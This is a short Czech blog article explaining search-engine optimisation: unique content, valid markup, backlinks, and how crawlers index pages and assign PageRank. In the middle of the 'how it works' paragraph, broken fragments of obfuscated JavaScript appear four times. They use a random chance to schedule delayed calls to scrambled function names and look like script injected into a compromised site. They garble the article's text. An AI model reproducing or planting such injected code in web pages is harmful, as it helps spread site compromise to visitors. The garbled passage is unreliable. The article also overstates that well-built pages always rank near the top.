0

Co je to SEO ?

Kategorie: SEO - omyly, fakta, souvislosti

Model - co je optimalizace webu?

SEO ( Search Engine Optimization ) neboli optimalizace pro vyhledávače je metodika vytváření a upravování webových stránek takovým způsobem, aby jejich forma a obsah byly vhodné pro internetové vyhledávače (př. google.cz, seznam.cz…).

Mezi hlavní pravidla metodiky SEO patří: kvalitní a unikátní obsah stránek, pravidelné aktuality, kód napsaný dle normy (tvůrce stránky musí používat syntakticky správný zápis kódu, př. správné nadpisy, odkazy, fotky s popisky …). Dalším důležitým faktorem, který patří do SEO, je počet odkazujících webových odkazů z jiných stránek na vaše stránky.

A jak to funguje?andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}
Vyhledávač si bez vašeho vědomí prohlédne („prošmejdí“) stránky, okopíruje si důležitý obsah do své databáze a stránky ohodnotí body (přidělí pagerank), které pak určují pozici ve vyhledávačích. Pokud jsou stránky profesionálně naprogramovány, není možné, aby je vyhledávač nenašel a nezobrazil na předních pozicích pro hledaná klíčová slova.

Tweet about this on TwitterShare on FacebookEmail this to someone
lospapunos@seznam.cz'

Komentáře

Loading Facebook Comments ...

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

3 × three =